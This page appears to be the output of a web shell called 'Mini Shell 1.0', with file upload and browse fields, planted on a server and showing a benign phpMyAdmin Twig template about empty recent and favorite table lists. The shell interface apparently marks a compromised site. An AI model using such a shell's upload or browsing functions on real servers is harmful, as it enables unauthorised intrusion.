HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/html/phpmyadmin/templates/
Upload File :
Current File : /var/www/html/phpmyadmin/templates/recent_favorite_table_no_tables.twig
<li class="warp_link">
    {% if is_recent  %}
        {% trans 'There are no recent tables.' %}
    {% else %}
        {% trans 'There are no favorite tables.'  %}
    {% endif %}
</li>